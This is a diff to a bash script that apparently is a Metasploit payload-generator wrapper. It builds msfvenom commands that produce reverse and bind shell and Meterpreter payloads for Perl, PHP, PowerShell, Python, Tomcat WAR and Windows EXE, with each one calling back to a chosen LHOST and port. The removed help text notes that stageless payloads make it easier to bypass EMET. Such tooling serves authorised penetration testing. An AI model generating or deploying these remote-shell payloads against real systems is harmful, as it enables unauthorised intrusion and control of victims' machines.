- CMD="msfvenom -p ${PAYLOAD} -f ${FILEEXT} --platform ${TYPE} -a x86 -e generic/none LHOST=${IP} LPORT=${PORT} -o ${OUTPATH}${TYPE}-${STAGE}-${SHELL}-${PORT}.${FILEEXT}" - doAction "${TYPE}" "${IP}" "${PORT}" "${PAYLOAD}" "${CMD}" "${FILEEXT}" "${SHELL}" "${STAGE}" "${VERBOSE}" + PAYLOAD="osx/x86/${SHELL}${_STAGE}${DIRECTION}_${METHOD}" + CMD="msfvenom -p ${PAYLOAD} -f ${FILEEXT} --platform ${TYPE} -a x86 -e generic/none LHOST=${IP} LPORT=${PORT} > ${OUTPATH}${TYPE}-${SHELL}-${STAGE}-${DIRECTION}-${METHOD}-${PORT}.${FILEEXT}" + doAction "${TYPE}" "${IP}" "${PORT}" "${PAYLOAD}" "${CMD}" "${FILEEXT}" "${SHELL}" "${DIRECTION}" "${STAGE}" "${METHOD}" "${VERBOSE}" ## Perl elif [[ "${TYPE}" == "perl" || "${TYPE}" == "pl" ]]; then - [[ "${SHELL}" == "" ]] && SHELL="shell" - [[ "${STAGE}" == "" ]] && STAGE="staged" && _STAGE="/" - # meterpreter or stageless - Invalid Payload Selected + [[ -z "${SHELL}" ]] && SHELL="shell" + [[ -z "${STAGE}" ]] && STAGE="staged" && _STAGE="/" + # Can't do: meterpreter or stageless - Invalid Payload Selected if [[ "${STAGE}" == "stageless" ]]; then - echo -e " ${YELLOW}[i]${RESET} Unable to do STAGLESSS PERL. There ${RED}isn't a option in Metasploit to allow it${RESET}. =(" >&2 - [[ "${VERBOSE}" != 'true' ]] && exit 5 + echo -e " ${YELLOW}[i]${RESET} Unable to do ${STAGE} Perl. There ${RED}isn't a option in Metasploit to allow it${RESET}. =(" >&2 elif [[ "${SHELL}" == "meterpreter" ]]; then - echo -e " ${YELLOW}[i]${RESET} Unable to do METERPRETER PERL. There ${RED}isn't a PERL Meterpreter${RESET}...yet." >&2 - [[ "${VERBOSE}" != 'true' ]] && exit 5 + echo -e " ${YELLOW}[i]${RESET} Unable to do ${SHELL} PERL. There ${RED}isn't a Perl Meterpreter${RESET}...yet." >&2 fi TYPE="linux" FILEEXT="pl" - PAYLOAD="cmd/unix${_STAGE}reverse_perl" - CMD="msfvenom -p ${PAYLOAD} -f ${FILEEXT} --platform unix -a cmd -e generic/none LHOST=${IP} LPORT=${PORT} -o ${OUTPATH}${TYPE}-${STAGE}-${SHELL}-${PORT}.${FILEEXT}" - doAction "${TYPE}" "${IP}" "${PORT}" "${PAYLOAD}" "${CMD}" "${FILEEXT}" "${SHELL}" "${STAGE}" "${VERBOSE}" + PAYLOAD="cmd/unix${_STAGE}${DIRECTION}_perl" + CMD="msfvenom -p ${PAYLOAD} -f ${FILEEXT} --platform unix -a cmd -e generic/none LHOST=${IP} LPORT=${PORT} > ${OUTPATH}${TYPE}-${SHELL}-${STAGE}-${DIRECTION}-${METHOD}-${PORT}.${FILEEXT}" + doAction "${TYPE}" "${IP}" "${PORT}" "${PAYLOAD}" "${CMD}" "${FILEEXT}" "${SHELL}" "${DIRECTION}" "${STAGE}" "${METHOD}" "${VERBOSE}" ## PHP elif [[ "${TYPE}" == "php" ]]; then - [[ "${SHELL}" == "" ]] && SHELL="meterpreter" - [[ "${STAGE}" == "" ]] && STAGE="stageless" && _STAGE="_" - # shell - Invalid Payload Selected + [[ -z "${SHELL}" ]] && SHELL="meterpreter" + [[ -z "${STAGE}" ]] && STAGE="staged" && _STAGE="/" + # Can't do: shell - Invalid Payload Selected if [[ "${SHELL}" == "shell" ]]; then - echo -e " ${YELLOW}[i]${RESET} Unable to do SHELL PHP. There ${RED}isn't a option in Metasploit to allow it${RESET}. =(" >&2 - [[ "${VERBOSE}" != 'true' ]] && exit 5 + echo -e " ${YELLOW}[i]${RESET} Unable to do ${SHELL} PHP. There ${RED}isn't a option in Metasploit to allow it${RESET}. =(" >&2 fi TYPE="php" FILEEXT="php" - PAYLOAD="${TYPE}/${SHELL}${_STAGE}reverse_tcp" - CMD="msfvenom -p ${PAYLOAD} -f raw --platform ${TYPE} -e generic/none -a ${TYPE} LHOST=${IP} LPORT=${PORT} -o ${OUTPATH}${TYPE}-${STAGE}-${SHELL}-${PORT}.${FILEEXT}" - doAction "${TYPE}" "${IP}" "${PORT}" "${PAYLOAD}" "${CMD}" "${FILEEXT}" "${SHELL}" "${STAGE}" "${VERBOSE}" + PAYLOAD="${TYPE}/${SHELL}${_STAGE}${DIRECTION}_${METHOD}" + CMD="msfvenom -p ${PAYLOAD} -f raw --platform ${TYPE} -e generic/none -a ${TYPE} LHOST=${IP} LPORT=${PORT} > ${OUTPATH}${TYPE}-${SHELL}-${STAGE}-${DIRECTION}-${METHOD}-${PORT}.${FILEEXT}" + doAction "${TYPE}" "${IP}" "${PORT}" "${PAYLOAD}" "${CMD}" "${FILEEXT}" "${SHELL}" "${DIRECTION}" "${STAGE}" "${METHOD}" "${VERBOSE}" ## Powershell elif [[ "${TYPE}" == "powershell" || "${TYPE}" == "ps1" ]]; then - [[ "${SHELL}" == "" ]] && SHELL="meterpreter" - [[ "${STAGE}" == "" ]] && STAGE="stageless" && _STAGE="_" + [[ -z "${SHELL}" ]] && SHELL="meterpreter" + [[ -z "${STAGE}" ]] && STAGE="stageless" && _STAGE="_" + [[ "${METHOD}" == "find_port" ]] && METHOD="allports" TYPE="windows" FILEEXT="ps1" - PAYLOAD="${TYPE}/${SHELL}${_STAGE}reverse_tcp" - CMD="msfvenom -p ${PAYLOAD} -f ps1 --platform ${TYPE} -e generic/none -a x86 LHOST=${IP} LPORT=${PORT} -o ${OUTPATH}${TYPE}-${STAGE}-${SHELL}-${PORT}.${FILEEXT}" - doAction "${TYPE}" "${IP}" "${PORT}" "${PAYLOAD}" "${CMD}" "${FILEEXT}" "${SHELL}" "${STAGE}" "${VERBOSE}" + PAYLOAD="${TYPE}/${SHELL}${_STAGE}${DIRECTION}_${METHOD}" + CMD="msfvenom -p ${PAYLOAD} -f ps1 --platform ${TYPE} -e generic/none -a x86 LHOST=${IP} LPORT=${PORT} > ${OUTPATH}${TYPE}-${SHELL}-${STAGE}-${DIRECTION}-${METHOD}-${PORT}.${FILEEXT}" + doAction "${TYPE}" "${IP}" "${PORT}" "${PAYLOAD}" "${CMD}" "${FILEEXT}" "${SHELL}" "${DIRECTION}" "${STAGE}" "${METHOD}" "${VERBOSE}" ## Python elif [[ "${TYPE}" == "python" || "${TYPE}" == "py" ]]; then - [[ "${SHELL}" == "" ]] && SHELL="meterpreter" - [[ "${STAGE}" == "" ]] && STAGE="staged" && _STAGE="/" - # staged shell // stageless meterpreter - Invalid Payload Selected + [[ -z "${SHELL}" ]] && SHELL="meterpreter" + [[ -z "${STAGE}" ]] && STAGE="staged" && _STAGE="/" + # Cant do: staged shell // stageless meterpreter // stageless bind - Invalid Payload Selected if [[ "${STAGE}" == "staged" && "${SHELL}" == "shell" ]]; then - echo -e " ${YELLOW}[i]${RESET} Unable to do STAGED SHELL Python. There ${RED}isn't a option in Metasploit to allow it${RESET}. =(" >&2 - [[ "${VERBOSE}" != 'true' ]] && exit 5 + echo -e " ${YELLOW}[i]${RESET} Unable to do ${STAGE} ${SHELL} Python. There ${RED}isn't a option in Metasploit to allow it${RESET}. =(" >&2 elif [[ "${STAGE}" == "stageless" && "${SHELL}" == "meterpreter" ]]; then - echo -e " ${YELLOW}[i]${RESET} Unable to do STAGEless METERPRETER Python. There ${RED}isn't a option in Metasploit to allow it${RESET}. =(" >&2 - [[ "${VERBOSE}" != 'true' ]] && exit 5 + echo -e " ${YELLOW}[i]${RESET} Unable to do ${STAGE} ${SHELL} Python. There ${RED}isn't a option in Metasploit to allow it${RESET}. =(" >&2 + elif [[ "${STAGE}" == "stageless" && "${DIRECTION}" == "bind" ]]; then + echo -e " ${YELLOW}[i]${RESET} Unable to do ${STAGE} ${DIRECTION} Python. There ${RED}isn't a option in Metasploit to allow it${RESET}. =(" >&2 fi TYPE="python" FILEEXT="py" - PAYLOAD="${TYPE}/${SHELL}${_STAGE}reverse_tcp" - CMD="msfvenom -p ${PAYLOAD} -f raw --platform ${TYPE} -e generic/none -a ${TYPE} LHOST=${IP} LPORT=${PORT} -o ${OUTPATH}${TYPE}-${STAGE}-${SHELL}-${PORT}.${FILEEXT}" - doAction "${TYPE}" "${IP}" "${PORT}" "${PAYLOAD}" "${CMD}" "${FILEEXT}" "${SHELL}" "${STAGE}" "${VERBOSE}" + PAYLOAD="${TYPE}/${SHELL}${_STAGE}${DIRECTION}_${METHOD}" + CMD="msfvenom -p ${PAYLOAD} -f raw --platform ${TYPE} -e generic/none -a ${TYPE} LHOST=${IP} LPORT=${PORT} > ${OUTPATH}${TYPE}-${SHELL}-${STAGE}-${DIRECTION}-${METHOD}-${PORT}.${FILEEXT}" + doAction "${TYPE}" "${IP}" "${PORT}" "${PAYLOAD}" "${CMD}" "${FILEEXT}" "${SHELL}" "${DIRECTION}" "${STAGE}" "${METHOD}" "${VERBOSE}" ## Tomcat elif [[ "${TYPE}" == "tomcat" || "${TYPE}" == "war" ]]; then - [[ "${SHELL}" == "" ]] && SHELL="meterpreter" - [[ "${STAGE}" == "" ]] && STAGE="staged" && _STAGE="/" - # stageless meterpreter - Invalid Payload Selected + [[ -z "${SHELL}" ]] && SHELL="meterpreter" + [[ -z "${STAGE}" ]] && STAGE="staged" && _STAGE="/" + # Cant do: stageless meterpreter // stageless bind // find_ports (Invalid Payload Selected) if [[ "${STAGE}" == "stageless" && "${SHELL}" == "meterpreter" ]]; then - echo -e " ${YELLOW}[i]${RESET} Unable to do STAGELESS METERPRETER TOMCAT. There ${RED}isn't a option in Metasploit to allow it${RESET}. =(" >&2 - [[ "${VERBOSE}" != 'true' ]] && exit 5 + echo -e " ${YELLOW}[i]${RESET} Unable to do ${STAGE} ${SHELL} Tomcat. There ${RED}isn't a option in Metasploit to allow it${RESET}. =(" >&2 + elif [[ "${STAGE}" == "stageless" && "${DIRECTION}" == "bind" ]]; then + echo -e " ${YELLOW}[i]${RESET} Unable to do ${DIRECTION} ${STAGE} Tomcat. There ${RED}isn't a option in Metasploit to allow it${RESET}. =(" >&2 + elif [[ "${METHOD}" == "find_ports" ]]; then + echo -e " ${YELLOW}[i]${RESET} Unable to do ${METHOD} Tomcat. There ${RED}isn't a option in Metasploit to allow it${RESET}. =(" >&2 fi TYPE="tomcat" FILEEXT="war" - PAYLOAD="java/${SHELL}${_STAGE}reverse_tcp" - CMD="msfvenom -p ${PAYLOAD} -f raw --platform java -a x86 -e generic/none LHOST=${IP} LPORT=${PORT} -o ${OUTPATH}${TYPE}-${STAGE}-${SHELL}-${PORT}.${FILEEXT}" - doAction "${TYPE}" "${IP}" "${PORT}" "${PAYLOAD}" "${CMD}" "${FILEEXT}" "${SHELL}" "${STAGE}" "${VERBOSE}" + PAYLOAD="java/${SHELL}${_STAGE}${DIRECTION}_${METHOD}" + CMD="msfvenom -p ${PAYLOAD} -f raw --platform java -a x86 -e generic/none LHOST=${IP} LPORT=${PORT} > ${OUTPATH}${TYPE}-${SHELL}-${STAGE}-${DIRECTION}-${METHOD}-${PORT}.${FILEEXT}" + doAction "${TYPE}" "${IP}" "${PORT}" "${PAYLOAD}" "${CMD}" "${FILEEXT}" "${SHELL}" "${DIRECTION}" "${STAGE}" "${METHOD}" "${VERBOSE}" ## Windows elif [[ "${TYPE}" == "windows" || "${TYPE}" == "win" || "${TYPE}" == "exe" ]]; then - [[ "${SHELL}" == "" ]] && SHELL="meterpreter" - [[ "${STAGE}" == "" ]] && STAGE="stageless" && _STAGE="_" + [[ -z "${SHELL}" ]] && SHELL="meterpreter" + [[ -z "${STAGE}" ]] && STAGE="staged" && _STAGE="/" + [[ "${METHOD}" == "find_port" ]] && METHOD="allports" + # Its able todo anything that you throw at it =). TYPE="windows" FILEEXT="exe" - PAYLOAD="${TYPE}/${SHELL}${_STAGE}reverse_tcp" - CMD="msfvenom -p ${PAYLOAD} -f ${FILEEXT} --platform ${TYPE} -a x86 -e generic/none LHOST=${IP} LPORT=${PORT} -o ${OUTPATH}${TYPE}-${STAGE}-${SHELL}-${PORT}.${FILEEXT}" - doAction "${TYPE}" "${IP}" "${PORT}" "${PAYLOAD}" "${CMD}" "${FILEEXT}" "${SHELL}" "${STAGE}" "${VERBOSE}" + PAYLOAD="${TYPE}/${SHELL}${_STAGE}${DIRECTION}_${METHOD}" + CMD="msfvenom -p ${PAYLOAD} -f ${FILEEXT} --platform ${TYPE} -a x86 -e generic/none LHOST=${IP} LPORT=${PORT} > ${OUTPATH}${TYPE}-${SHELL}-${STAGE}-${DIRECTION}-${METHOD}-${PORT}.${FILEEXT}" + doAction "${TYPE}" "${IP}" "${PORT}" "${PAYLOAD}" "${CMD}" "${FILEEXT}" "${SHELL}" "${DIRECTION}" "${STAGE}" "${METHOD}" "${VERBOSE}" + +# Batch/Loop modes +elif [[ "${BATCH}" == "true" || "${LOOP}" == "true" ]]; then + #SUCCESS=true + exit 0 +# Blank input elif [[ -z "${TYPE}" ]]; then - #echo -e "\n ${YELLOW}[i]${RESET} ${YELLOW}Missing type${RESET}" - true + echo -e "\n ${YELLOW}[i]${RESET} ${YELLOW}Missing type${RESET}" + +# Unexected input else echo -e "\n ${YELLOW}[i]${RESET} Unknown type: ${YELLOW}${TYPE}${RESET}" >&2 fi @@ -549,51 +730,11 @@ fi ##### Done! -if [[ "$SUCCESS" == true ]]; then +if [[ "${SUCCESS}" == true ]]; then echo -e " ${GREEN}[?]${RESET} Quick ${GREEN}web server${RESET} for file transfer? python -m SimpleHTTPServer 8080" echo -e " ${BLUE}[*]${RESET} ${BLUE}Done${RESET}!" - exit 0 else - echo -e "\n ${YELLOW}[i]${RESET} ${BLUE}${0}${RESET} () () () () () ()" - echo -e " ${YELLOW}[i]${RESET} Example: ${0} windows 192.168.1.10 # Windows & manual IP." - echo -e " ${YELLOW}[i]${RESET} ${0} elf eth0 4444 # Linux, eth0's IP & manual port." - echo -e " ${YELLOW}[i]${RESET} ${0} stageless cmd py verbose # Python, stageless command prompt." - echo -e " ${YELLOW}[i]${RESET} ${0} loop eth1 # A payload for every type, using eth1's IP." - echo -e " ${YELLOW}[i]${RESET} ${0} msf batch eth1 # All possible Meterpreter payloads, using eth1's IP." - echo "" - echo -e " ${YELLOW}[i]${RESET} : (All ${YELLOW}reverse TCP${RESET} payloads)" - echo -e " ${YELLOW}[i]${RESET} + ${YELLOW}ASP${RESET}" - echo -e " ${YELLOW}[i]${RESET} + ${YELLOW}ASPX${RESET}" - echo -e " ${YELLOW}[i]${RESET} + ${YELLOW}Bash${RESET} [.${YELLOW}sh${RESET}]" - echo -e " ${YELLOW}[i]${RESET} + ${YELLOW}Java${RESET} [.${YELLOW}jsp${RESET}]" - echo -e " ${YELLOW}[i]${RESET} + ${YELLOW}Linux${RESET} [.${YELLOW}elf${RESET}]" - echo -e " ${YELLOW}[i]${RESET} + ${YELLOW}OSX${RESET} [.${YELLOW}macho${RESET}]" - echo -e " ${YELLOW}[i]${RESET} + ${YELLOW}Perl${RESET} [.${YELLOW}pl${RESET}]" - echo -e " ${YELLOW}[i]${RESET} + ${YELLOW}PHP${RESET}" - echo -e " ${YELLOW}[i]${RESET} + ${YELLOW}Powershell${RESET} [.${YELLOW}ps1${RESET}]" - echo -e " ${YELLOW}[i]${RESET} + ${YELLOW}Python${RESET} [.${YELLOW}py${RESET}]" - echo -e " ${YELLOW}[i]${RESET} + ${YELLOW}Tomcat${RESET} [.${YELLOW}war${RESET}]" - echo -e " ${YELLOW}[i]${RESET} + ${YELLOW}Windows${RESET} [.${YELLOW}exe${RESET}]" - echo "" - echo -e " ${YELLOW}[i]${RESET} Rather than putting , you can do a ${YELLOW}interface${RESET} and MPC will detect that IP address." - echo -e " ${YELLOW}[i]${RESET} Missing will default to the ${YELLOW}IP menu${RESET}." - echo "" - echo -e " ${YELLOW}[i]${RESET} Missing will default to ${YELLOW}443${RESET}." - echo "" - echo -e " ${YELLOW}[i]${RESET} splits the payload into parts, making it ${YELLOW}smaller but dependant on Metasploit${RESET}." - echo -e " ${YELLOW}[i]${RESET} is the complete ${YELLOW}standalone payload${RESET}. More 'stabe' than ." - echo -e " ${YELLOW}[i]${RESET} Missing will default to ${YELLOW}${RESET}." - echo -e " ${YELLOW}[i]${RESET} Note: Metasploit doesn't (yet!) support for every format." - echo "" - echo -e " ${YELLOW}[i]${RESET} is a standard/${YELLOW}native command prompt${RESET}/terminal to interactive with." - echo -e " ${YELLOW}[i]${RESET} is a custom ${YELLOW}cross platform Meterpreter${RESET} shell, gaining the full power of Metasploit." - echo -e " ${YELLOW}[i]${RESET} Note: Metasploit doesn't (yet!) support / for every format." - echo -e " ${YELLOW}[i]${RESET} Missing will default to ${YELLOW}Meterpreter${RESET}." - [[ "${VERBOSE}" == "true" ]] && echo -e " ${YELLOW}[i]${RESET} payloads are generally much ${YELLOW}smaller${RESET} than and easier to bypass EMET." - echo "" - echo -e " ${YELLOW}[i]${RESET} will generate ${YELLOW}as many combinations as possible${RESET}: , & ." - echo -e " ${YELLOW}[i]${RESET} will just create ${YELLOW}one of each${RESET} ." - echo "" - echo -e " ${YELLOW}[i]${RESET} will display ${YELLOW}more information${RESET} during the process." - exit 1 + doHelp fi + +exit 0